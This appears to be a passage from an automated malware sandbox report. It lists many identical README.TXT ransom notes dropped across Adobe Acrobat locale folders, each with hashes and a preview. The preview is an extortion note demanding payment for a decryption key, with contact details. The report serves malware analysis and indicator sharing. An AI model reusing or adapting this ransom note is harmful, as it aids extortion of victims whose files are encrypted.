                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-fr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fr-ma\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\he-il\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hr-hr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\hu-hu\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ja-jp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nl-nl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sk-sk\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
